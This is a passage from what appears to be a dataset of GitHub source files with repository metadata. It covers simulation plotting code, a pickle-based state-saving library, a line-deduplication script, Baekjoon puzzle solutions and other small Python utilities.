3),\n cm.imola_r(1.0 * 2 / 3),\n cm.imola_r(1.0),\n ]\n ax.plot(\n data_df.x, data_df.yellow_lot_occup / 100, linewidth=2, color=color_list[0]\n )\n ax.plot(\n data_df.x, data_df.green_lot_occup / 100, linewidth=2, color=color_list[1]\n )\n ax.plot(\n data_df.x, data_df.teal_lot_occup / 100, linewidth=2, color=color_list[2]\n )\n ax.plot(\n data_df.x, data_df.blue_lot_occup / 100, linewidth=2, color=color_list[3]\n )\n ax.plot(\n data_df.x,\n data_df.garages_occup / 100,\n label=\"Garage(s)\",\n linewidth=2,\n color=\"black\",\n )\n ax.plot(\n data_df.x,\n data_df.overall_occup / 100,\n label=\"Kerbside Parking Overall\",\n linewidth=4,\n color=cm.berlin(1.0),\n linestyle=(0, (1, 5)),\n ) if \"composite\" in str(outpath).lower() else None\n ax.plot(\n data_df.x,\n [0.75] * len(data_df.x),\n linewidth=2,\n color=\"red\",\n linestyle=\"dashed\",\n )\n ax.plot(\n data_df.x,\n [0.90] * len(data_df.x),\n linewidth=2,\n color=\"red\",\n linestyle=\"dashed\",\n )\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Utilised Capacity\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n create_colourbar(fig)\n ax.legend(fontsize=25, loc=loc)\n\n fig.savefig(str(outpath / f\"occupancy_{loc}.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_social(data_df, outpath):\n \"\"\"\n PLot shares of different income classes over run of episode.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n # Save plot with three variants of legend location\n for loc in [\"lower right\", \"right\", \"upper right\"]:\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n color_list = [cm.bamako(0), cm.bamako(1.0 * 1 / 2), cm.bamako(1.0)]\n ax.plot(\n data_df.x,\n data_df.low_income / 100,\n label=\"Low Income\",\n linewidth=3,\n color=color_list[0],\n )\n ax.plot(\n data_df.x,\n data_df.middle_income / 100,\n label=\"Middle Income\",\n linewidth=3,\n color=color_list[1],\n )\n ax.plot(\n data_df.x,\n data_df.high_income / 100,\n label=\"High Income\",\n linewidth=3,\n color=color_list[2],\n )\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Share of Cars per Income Class\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n ax.legend(fontsize=25, loc=loc)\n\n fig.savefig(str(outpath / f\"social_{loc}.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_speed(data_df, outpath):\n \"\"\"\n Plot average speed over run of episode.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n ax.plot(data_df.x, data_df.average_speed, linewidth=3, color=cm.bamako(0))\n ax.plot(\n data_df.x,\n data_df.average_speed.rolling(50).mean(),\n linewidth=3,\n color=cm.bamako(1.0),\n )\n\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Average Normalised Speed\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n\n fig.savefig(str(outpath / \"speed.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_n_cars(data_df, outpath):\n \"\"\"\n Plot number of cars over run of episode.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n ax.plot(data_df.x, data_df.cars_overall / 100, linewidth=3, color=cm.bamako(0))\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Share of Initially Spawned Cars\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n\n fig.savefig(str(outpath / \"n_cars.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_income_stats(data_df, outpath):\n \"\"\"\n Plot mean, median and std. of income distribution of run of episode.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n # Save plot with three variants of legend location\n for loc in [\"lower right\", \"right\", \"upper right\"]:\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n color_list = [cm.berlin(0), cm.berlin(1.0 * 1 / 2), cm.berlin(1.0)]\n ax.plot(\n data_df.x, data_df[\"mean\"], label=\"Mean\", linewidth=3, color=color_list[0]\n )\n ax.plot(\n data_df.x,\n data_df[\"median\"],\n label=\"Median\",\n linewidth=3,\n color=color_list[1],\n )\n ax.plot(\n data_df.x,\n data_df[\"std\"],\n label=\"Standard Deviation\",\n linewidth=3,\n color=color_list[2],\n )\n ax.set_ylim(bottom=0, top=max(data_df[[\"mean\", \"median\", \"std\"]].max()) + 1)\n\n ax.set_ylabel(\"Income in €\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n ax.legend(fontsize=25, loc=loc)\n\n fig.savefig(str(outpath / f\"income_stats_{loc}.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_share_yellow(data_df, outpath):\n \"\"\"\n Plot share of different income classes on yellow CPZ.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n # Save plot with three variants of legend location\n for loc in [\"lower right\", \"right\", \"upper right\"]:\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n color_list = [cm.bamako(0), cm.bamako(1.0 * 1 / 2), cm.bamako(1.0)]\n ax.plot(\n data_df.x,\n data_df.share_y_low / 100,\n label=\"Low Income\",\n linewidth=3,\n color=color_list[0],\n )\n ax.plot(\n data_df.x,\n data_df.share_y_middle / 100,\n label=\"Middle Income\",\n linewidth=3,\n color=color_list[1],\n )\n ax.plot(\n data_df.x,\n data_df.share_y_high / 100,\n label=\"High Income\",\n linewidth=3,\n color=color_list[2],\n )\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Share of Cars in Yellow CPZ\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n ax.legend(fontsize=25, loc=loc)\n\n fig.savefig(str(outpath / f\"share_yellow_{loc}.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_share_parked(data_df, outpath):\n \"\"\"\n Plot share of parked cars per income class.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n # Save plot with three variants of legend location\n for loc in [\"lower right\", \"right\", \"upper right\"]:\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n color_list = [cm.bamako(0), cm.bamako(1.0 * 1 / 2), cm.bamako(1.0)]\n ax.plot(\n data_df.x,\n data_df.share_p_low / 100,\n label=\"Low Income\",\n linewidth=3,\n color=color_list[0],\n )\n ax.plot(\n data_df.x,\n data_df.share_p_middle / 100,\n label=\"Middle Income\",\n linewidth=3,\n color=color_list[1],\n )\n ax.plot(\n data_df.x,\n data_df.share_p_high / 100,\n label=\"High Income\",\n linewidth=3,\n color=color_list[2],\n )\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Share of Cars Finding Parking\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n ax.legend(fontsize=25, loc=loc)\n\n fig.savefig(str(outpath / f\"share_parked_{loc}.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_share_vanished(data_df, outpath):\n \"\"\"\n Plot share of vanished cars per income class.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n # Save plot with three variants of legend location\n for loc in [\"lower right\", \"right\", \"upper right\"]:\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n color_list = [cm.bamako(0), cm.bamako(1.0 * 1 / 2), cm.bamako(1.0)]\n ax.plot(\n data_df.x,\n data_df.share_v_low / (data_df.low_income[0] / 100 * 525),\n label=\"Low Income\",\n linewidth=3,\n color=color_list[0],\n )\n ax.plot(\n data_df.x,\n data_df.share_v_middle / (data_df.middle_income[0] / 100 * 525),\n label=\"Middle Income\",\n linewidth=3,\n color=color_list[1],\n )\n ax.plot(\n data_df.x,\n data_df.share_v_high / (data_df.high_income[0] / 100 * 525),\n label=\"High Income\",\n linewidth=3,\n color=color_list[2],\n )\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Normalised Share of Cars Vanished\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n ax.legend(fontsize=25, loc=loc)\n\n fig.savefig(str(outpath / f\"share_vanished_{loc}.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef create_colourbar(fig):\n \"\"\"\n Draws colourbar with colour of different CPZs on given figure.\n :param fig: Figure to draw colourbar on.\n :return:\n \"\"\"\n cmap = cm.imola\n\n fig.subplots_adjust(bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.01)\n cb_ax = fig.add_axes([0.8, 0.1, 0.015, 0.8])\n\n bounds = [0, 1, 2, 3, 4]\n norm = matplotlib.colors.BoundaryNorm(bounds, cmap.N)\n cbar = fig.colorbar(\n matplotlib.cm.ScalarMappable(norm=norm, cmap=cmap),\n cax=cb_ax,\n orientation=\"vertical\",\n )\n\n cbar.set_ticks([])\n cbar.ax.set_ylabel(\n r\"$\\Leftarrow$ Distance of CPZ to City Centre\", fontsize=25, loc=\"top\"\n )\n\n\ndef draw_radar_plot(input_dir):\n \"\"\"\n\n :param input_dir:\n :return:\n \"\"\"\n if glob(input_dir + \"/*.pkl\"):\n median_runs = glob(input_dir + \"/*.pkl\")\n median_labels = [re.findall(\"([a-zA-Z]+).pkl\", run)[0] for run in median_runs]\n else:\n median_runs = glob(input_dir + \"/*.csv\")\n median_labels = [re.findall(\"([a-zA-Z]+).csv\", run)[0] for run in median_runs]\n\n categories = [\n \"Optimize Occupancy\",\n \"Preserve Social Composition\",\n \" Maximize Speed\",\n \"Minimize Cars\",\n ]\n categories = [*categories, categories[0]]\n color_list = sns.color_palette(\"colorblind\")\n occup_scores = []\n social_scores = []\n speed_scores = []\n n_cars_scores = []\n performance_dict = dict()\n for i, run in enumerate(median_runs):\n try:\n df = pd.read_pickle(run, compression=\"zip\")\n except (FileNotFoundError, BadZipFile):\n df = get_data_from_run(run)\n label = median_labels[i]\n performance_dict[label] = dict()\n # Overall time\n occup_score = 0\n for c in [\"yellow\", \"green\", \"teal\", \"blue\"]:\n occup_score += (\n len(df[(df[f\"{c}_lot_occup\"] > 75) & (df[f\"{c}_lot_occup\"] < 90)])\n / len(df)\n ) * 0.25\n occup_scores.append(occup_score)\n n_cars_scores.append(1 - df[\"cars_overall\"].iloc[-1] / 100)\n speed_scores.append(df.average_speed.mean())\n social_scores.append(df.low_income.iloc[-1])\n\n for i, label in enumerate(median_labels):\n scores = []\n for score_list in [occup_scores, social_scores, speed_scores, n_cars_scores]:\n scores.append(score_list[i] / max(score_list))\n scores.append(scores[0])\n performance_dict[label][\"scores\"] = scores\n\n plt.rc(\"xtick\", labelsize=30)\n plt.rc(\"ytick\", labelsize=30)\n\n label_loc = np.linspace(start=0, stop=2 * np.pi, num=len(scores))\n\n fig = plt.figure(figsize=(20, 20))\n ax = fig.add_subplot(111, polar=True)\n for run_label, colour_i in zip(median_labels, [7, 0, 2, 1, 4, 8, 9]):\n if \"static\" in run_label or \"dynamic\" in run_label:\n label = r\"$\\mathrm{Baseline_{\" + run_label + r\"}}$\"\n else:\n label = r\"$\\mathrm{r_{\" + run_label + r\"}}$\"\n ax.plot(\n label_loc,\n performance_dict[run_label][\"scores\"],\n label=label,\n linewidth=4,\n color=color_list[colour_i],\n )\n ax.fill(\n label_loc,\n performance_dict[run_label][\"scores\"],\n alpha=0.25,\n color=color_list[colour_i],\n )\n\n ax.set_ylim(0, 1)\n\n ax.set_thetagrids(np.degrees(label_loc), labels=categories)\n for label, category in zip(ax.get_xticklabels(), categories):\n if \"Speed\" in category:\n label.set_horizontalalignment(\"left\")\n elif \"Occup\" in category:\n label.set_horizontalalignment(\"right\")\n ax.set_theta_offset(np.pi)\n ax.legend(fontsize=28, loc=\"upper right\", bbox_to_anchor=(1.35, 1.15))\n # ax.xaxis.set_tick_params(pad=15)\n ax.axes.yaxis.set_ticklabels([])\n #\n plt.tight_layout()\n ax.spines[\"polar\"].set_color(\"#222222\")\n\n fig.savefig(\"radar_plot.pdf\", bbox_inches=\"tight\")\n\n plt.show()\n","repo_name":"JakobKappenberger/ai-priced-parking","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":27542,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40127159523","text":"import os\nimport typing\nimport inspect\nimport pickle\nimport warnings\nimport portalocker\nimport pathlib\n\nExportable = type(typing.Any)(\n \"Exportable\",\n doc=\"\"\"Special type indicating an exportable type for the offshore package.\n This type behaves like Any for all practical purposes.\n \"\"\",\n)\n\n\nclass Offshore:\n def __init__(self, filename=\".offshore\", autosave=False, autoload=False):\n self._stack = inspect.stack()\n self._path = pathlib.Path(os.getcwd()) / filename\n self._autosave = bool(autosave)\n self._autoload = bool(autoload)\n self._store = {}\n\n try:\n self._load()\n except FileNotFoundError:\n self.dump()\n\n def __getattr__(self, item):\n if self._autoload:\n self.load()\n\n try:\n return self._store[item]\n except KeyError as e:\n raise AttributeError(str(e))\n\n def __setattr__(self, key, value):\n if key.startswith(\"_\"):\n self.__dict__[key] = value\n return\n\n self._store[key] = value\n\n if self._autosave:\n self.dump()\n\n def __getitem__(self, item):\n if self._autoload:\n self.load()\n\n return self._store[item]\n\n def __setitem__(self, key, value):\n self._store[key] = value\n\n if self._autosave:\n self.dump()\n\n def __delitem__(self, key):\n del self._store[key]\n\n if self._autosave:\n self.dump()\n\n def __contains__(self, item):\n if self._autoload:\n self.load()\n\n return item in self._store\n\n def __len__(self):\n if self._autoload:\n self.load()\n\n return len(self._store)\n\n def _load(self):\n with portalocker.Lock(str(self._path), \"rb\", timeout=60) as file:\n self._store = pickle.load(file)\n\n @staticmethod\n def _parse_stack(stack):\n frame = stack[1][0]\n global_vars = frame.f_globals\n module = inspect.getmodule(frame)\n\n if module is None:\n return [], global_vars\n\n annotations = [key for key, value in typing.get_type_hints(module).items() if value is Exportable]\n return annotations, global_vars\n\n def clear(self):\n self._store = {}\n self.dump()\n\n def snapshot(self):\n annotations, global_vars = self._parse_stack(self._stack)\n\n if not annotations:\n warnings.warn(f\"No exportable variables found\")\n\n for key in annotations:\n self._store[key] = global_vars[key]\n\n self.dump()\n\n def restore(self):\n annotations, global_vars = self._parse_stack(self._stack)\n\n if not annotations:\n warnings.warn(f\"No exportable variables found\")\n\n self.load()\n\n for key in annotations:\n if key not in self._store:\n warnings.warn(f\"Key '{key}' was not found in the state store and has not been restored\")\n continue\n\n global_vars[key] = self._store[key]\n\n def dump(self):\n with portalocker.Lock(str(self._path), \"wb\", timeout=60) as file:\n pickle.dump(self._store, file)\n\n file.flush()\n os.fsync(file.fileno())\n\n def load(self):\n try:\n self._load()\n except FileNotFoundError:\n warnings.warn(f\"State store not found in '{str(self._path)}'\")\n","repo_name":"kpdemetriou/offshore","sub_path":"offshore/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"4273916733","text":"import codecs\n\nline_seen=set()#初始化空的无序集合\n\nin_file=codecs.open('I:/codes/track4new.txt','r',encoding='utf-8')\n\nout_file=codecs.open('I:/codes/track4.1.txt','w',encoding='utf-8')\n\nlines=in_file.readlines()\n\nfor line in lines:\n if line not in line_seen:\n out_file.write(line)\n line_seen.add(line)\n\nin_file.close()\nout_file.close()\n","repo_name":"LuicelZhou/MultiView-Tracking-ReID","sub_path":"Detecting_and_Tracking/cleaning.py","file_name":"cleaning.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"20876661221","text":"'''\n딱지놀이\nhttps://www.acmicpc.net/problem/14696\n백준 브론즈1 14696\n\n두 어린이 A, B가 딱지놀이를 한다. 딱지놀이 규칙은 다음과 같다. 두 어린이는 처음에 여러 장의 딱지를 가지고 있고, 매 라운드마다 각자 자신이 가진 딱지 중 하나를 낸다. 딱지에는 별(★), 동그라미(●), 네모(■), 세모(▲), 네 가지 모양 중 하나 이상의 모양이 표시되어 있다. 두 어린이가 낸 딱지 중 어느 쪽이 더 강력한 것인지는 다음 규칙을 따른다.\n\n만약 두 딱지의 별의 개수가 다르다면, 별이 많은 쪽의 딱지가 이긴다.\n별의 개수가 같고 동그라미의 개수가 다르다면, 동그라미가 많은 쪽의 딱지가 이긴다.\n별, 동그라미의 개수가 각각 같고 네모의 개수가 다르다면, 네모가 많은 쪽의 딱지가 이긴다.\n별, 동그라미, 네모의 개수가 각각 같고 세모의 개수가 다르다면, 세모가 많은 쪽의 딱지가 이긴다.\n별, 동그라미, 네모, 세모의 개수가 각각 모두 같다면 무승부이다.\n\n라운드의 수 N과 두 어린이가 순서대로 내는 딱지의 정보가 주어졌을 때, 각 라운드별로 딱지놀이의 결과를 구하는 프로그램을 작성하시오.\n'''\n\n\nN = int(input()) # 총 라운드\n\nfor _ in range(N):\n A = {4:0, 3:0, 2:0, 1:0} # 보유한 딱지 개수\n B = {4:0, 3:0, 2:0, 1:0}\n _, *arg = map(int, input().split())\n for a in arg:\n A[a] += 1\n _, *arg = map(int, input().split())\n for b in arg:\n B[b] += 1\n\n\n for i in range(4, 0, -1): # 4부터 점검\n if A[i] > B[i]:\n print('A')\n break\n elif B[i] > A[i]:\n print('B')\n break\n else:\n print('D') # 무승부\n\n\n","repo_name":"seoda0000/TIL","sub_path":"AlgorithmProblemSolving/04_백준/Bronze/14696_딱지놀이.py","file_name":"14696_딱지놀이.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"42074071111","text":"from random import randint\nfrom termcolor import colored\nimport colorama\n\ncolorama.init()\n\n\ndef alg(a, i, j):\n if j - i == 1:\n if a[i] < 0 and a[j] > 0:\n return i\n else:\n return \"non c'è\"\n\n m = (i + j) // 2\n if a[m] > 0:\n return alg(a, i, m)\n else:\n return alg(a, m, j)\n\n\nLIM = 15\n\nfor _ in range(LIM // 2):\n array = [randint(LIM * -1, LIM) for _ in (range(randint(2, LIM)))]\n array.sort()\n # to remove duplicates\n array = list(dict.fromkeys(array))\n if array[- 1] < 0:\n array.append(array[- 1] * -1 + 1)\n if array[0] > 0:\n array[0] = array[0] * -1\n _n = len(array)\n\n alg_res = alg(array, 0, _n - 1)\n\n expected_value = \"non c'è\"\n for ind in range(_n - 1):\n if array[ind] < 0 and array[ind + 1] > 0:\n expected_value = ind\n break\n\n print(f'array: {array}\\nn : {_n}\\nexpected result: {expected_value}\\nalg result: {alg_res}\\nsame results: {colored(\"True\", \"green\") if alg_res == expected_value else colored(\"False\", \"red\")}\\n')\n","repo_name":"OB-UNISA/Algorithm-Design","sub_path":"exercises/exercises2_10.py","file_name":"exercises2_10.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30450677949","text":"from django.db import models\nfrom user_accounts.models import CustomUser\n\n# Create your models here.\nLOG = (\n ('Report','Report'),\n ('Refer','Refer'),\n ('Tip Upload','Tip Uplod'),\n ('Physical','Physical'),\n ('Relationship','Relationship'),\n ('Book Reading','Book Reading'),\n ('Meditation','Meditation'),\n\n)\nclass PointLogs(models.Model):\n log_description = models.CharField(max_length=500)\n user = models.ForeignKey(CustomUser,on_delete=models.CASCADE)\n datetime = models.DateTimeField(auto_now_add = True)\n log_type = models.CharField(max_length=100,choices=LOG)","repo_name":"Prakash617/bookwish","sub_path":"logs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23077780623","text":"#-*- encoding:UTF-8 -*-\n'''\nCreated on 2019/6/30\n\n@author: xcKev\n'''\n\nimport difflib\nimport alvintools.common_filer as filer\nimport alvintools.common_logger as log\nimport sys\ncurrent_log=log.get_log('comparer', log.LOG_DIR, 'comparer')\n\ndef compare_file(file_path1,file_path2,diff_path):\n if file_path1 == \"\" or file_path2 ==\"\":\n current_log.info(F\"path can't be blank: first path:{file_path1},second path:{file_path2}\")\n sys.exit()\n else:\n current_log.info(F\"comparing file between {file_path1} and {file_path2}\")\n text1_lines = filer.get_file_details(file_path1)\n text2_lines = filer.get_file_details(file_path2)\n diff = difflib.HtmlDiff()\n result = diff.make_file(text1_lines, text2_lines)\n try:\n result_h = open(diff_path,'w')\n result_h.write(result)\n current_log.info(\"Compared successfully finished\\n\")\n except IOError as error:\n current_log.error(F\"Failed to write html diff file: {error}\")","repo_name":"Kevin-san/ToolLesson","sub_path":"core/alvintools/common_comparer.py","file_name":"common_comparer.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7885179866","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nfrom Text_Traffic_Analysis.Packet_Segment import pkt_seg_by_delimiters\nfrom Text_Traffic_Analysis.Select_Words import top_words_set, select_key_words\nfrom Text_Traffic_Analysis.Format_Extract import infer_protocol_format\nfrom Text_Traffic_Analysis.Protocol_Feature import get_traffic_feature\n\ndef Text_Re(DATA_PATH, MODE, NAME):\n\n print(os.path.join(DATA_PATH, \"text_tcp/0\"))\n if os.path.exists(os.path.join(DATA_PATH, \"text_tcp/0\")):\n DATA_PATH += \"/text_tcp/0/\"\n else:\n print(\"[info] No text data set.\")\n return\n if len(os.listdir(DATA_PATH)) < 50:\n print(\"[info] No text data.\")\n return \n\n SEG_OUT_PATH = './run_file/seg_' + NAME \n WORDS_PATH = './run_file/words_' + NAME \n P_OUT_PATH = './run_file/pattern_' + NAME \n\n print(\"Data directory path: \", DATA_PATH)\n\n # 协议逆向开始\n first_words = pkt_seg_by_delimiters(DATA_PATH, SEG_OUT_PATH)\n\n tagged_weighted_word = top_words_set(SEG_OUT_PATH, WORDS_PATH)\n\n f_words, b_words, f_data, b_data = select_key_words(tagged_weighted_word, DATA_PATH, P_OUT_PATH, MODE)\n\n f_formats, b_formats = infer_protocol_format(P_OUT_PATH)\n\n # 基于逆向的报文格式推断协议特征字符串\n get_traffic_feature(NAME, f_formats, b_formats, f_data, b_data, DATA_PATH, MODE)\n","repo_name":"737898487/2018","sub_path":"Text_Traffic_Analysis/Text_Entrance.py","file_name":"Text_Entrance.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43088349066","text":"import numpy as np\n\n\nALL_DIRECTIONS = np.array(\n [[-1, -1], [-1, 0], [-1, 1],\n [0, -1], [0, 0], [0, 1],\n [1, -1], [1, 0], [1, 1]]\n)\nNW, N, NE, W, NOOP, E, SW, S, SE = ALL_DIRECTIONS\n\n\ndef get_movement_vectors(num_directions: int):\n mapping = {9: ALL_DIRECTIONS,\n 8: np.stack([NW, N, NE, W, E, SW, S, SE]),\n 5: np.stack([W, N, E, S, NOOP]),\n 4: np.stack([W, N, E, S])}\n if num_directions not in mapping:\n raise ValueError(\"Can only handle 9, 8, 5 or 4 directions!\")\n return mapping[num_directions]\n\n\nclass MovementTranslator:\n\n @staticmethod\n def translate(opencv_keypress):\n return {\n -1: NOOP, 83: E, 81: W, 82: N, 84: S, 27: None,\n 119: N, 115: S, 97: W, 100: E\n }[opencv_keypress]\n","repo_name":"csxeba/grund","sub_path":"grund/util/movement.py","file_name":"movement.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35608957389","text":"'''\nCreated on 12 Nov 2013\n\n@author: fafey\n'''\n\nfrom z3 import *\n\n\nx = Int('x')\ny = Int('x')\nfun = Function('fun', IntSort(), IntSort())\n\n\n\nsolve(x > 5, x<7, ForAll(x, fun(x) == 10), fun(y) == 1)\n","repo_name":"songhui/cspadapt","sub_path":"vmplacement/z4/src/DatatypeTest.py","file_name":"DatatypeTest.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"71345239253","text":"# Charles Buyas cjb8qf\n\n\nimport random\nprint(\"Input a -1 to play with a random number\")\nstart = int(input(\"What should the answer be?: \"))\ncount = 0\nif start == -1:\n start = random.randint(1, 100)\nelse:\n num = start\n\nwhile count < 4:\n guess = int(input(\"Guess a number: \"))\n if int(guess) == int(start):\n print(\"You win!\")\n exit(0)\n elif int(guess) > int(start):\n count += 1\n print(\"The number is lower than that.\")\n else:\n count += 1\n print(\"The number is higher than that.\")\n\nif count == 4:\n guess = int(input(\"Guess a number: \"))\n if int(guess) == int(start):\n print(\"You win!\")\n exit(0)\n else:\n print(\"You lose; the number was \" + str(start) + \".\")\n","repo_name":"AliveSphere/Introductory_PyCharm_Files","sub_path":"POTD/higher_lower.py","file_name":"higher_lower.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39676764635","text":"# 브루트포스 풀이\n'''\n주어진 테트로미노를 회전, 대칭하여 만들어지는 가지수는 총 19종류이다.\n문제에서 주어지는 종이를 2중 for문으로 탐색하면서, 주어진 테트로미노 형태의 숫자 합계를 비교한다.\n각 테트로미노당 정사각형 4개로 이루어져 있으므로 i, j가 이동하는 delta를 3개씩 19종류, 총 57개의 delta를 만들어둔다.\n본 풀이에서 delta의 순서는 문제에 주어진 도형을 회전/대칭 후 회전 하는 순서대로 설정하였다.\n'''\n# [A] 테트로미노의 경우의 수에 따른 delta 설정\ndi = [0, 0, 0, 1, 2, 3, 0, 1, 1, 1, 2, 2, 0, 0, 1, 0, 1, 2, 0, 0, -1, 0, -1, -2, 1, 1, 1, 0, 1, 2, 0, 0, 1, 1, 1, 2, 0, -1, -1, 1, 1, 2, 0, 1, 1, 0, 0, 1, -1, 0, 1, 1, 1, 1, 1, 2, 1]\ndj = [1, 2, 3, 0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 2, 0, 1, 1, 1, 1, 2, 2, 1, 1, 1, 0, 1, 2, 1, 0, 0, 1, 2, 2, 0, 1, 1, 1, 1, 2, 0, -1, -1, 1, 1, 2, 1, 2, 1, 1, 1, 1, -1, 0, 1, 0, 0, 1]\ndirection = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27, 30, 33, 36, 39, 42, 45, 48, 51, 54]\n\n# [1] 입력값 설정\nfrom sys import stdin\nN, M = map(int, stdin.readline().split())\npaper = [[] for _ in '_'*N]\nfor i in range(N):\n paper[i] = list(map(int, stdin.readline().split()))\n\n# [2] 종이에 적혀진 수 탐색 시작\nresult = 0\nfor i in range(N):\n for j in range(M):\n for dr in direction:\n sumV = paper[i][j] # dr이 갱신될 때마다 sumV도 초기화된다.\n\n ni, nj = i+di[dr], j+dj[dr] # 첫 번째 ni, nj\n if 0 <= ni < N and 0 <= nj < M:\n sumV += paper[ni][nj]\n\n ni, nj = i+di[dr+1], j+dj[dr+1] # 두 번째 ni, nj\n if 0 <= ni < N and 0 <= nj < M:\n sumV += paper[ni][nj]\n\n ni, nj = i+di[dr+2], j+dj[dr+2] # 마지막 ni, nj\n if 0 <= ni < N and 0 <= nj < M:\n sumV += paper[ni][nj]\n\n # 총 4개의 수를 더했다면 result값과 비교\n if result < sumV:\n result = 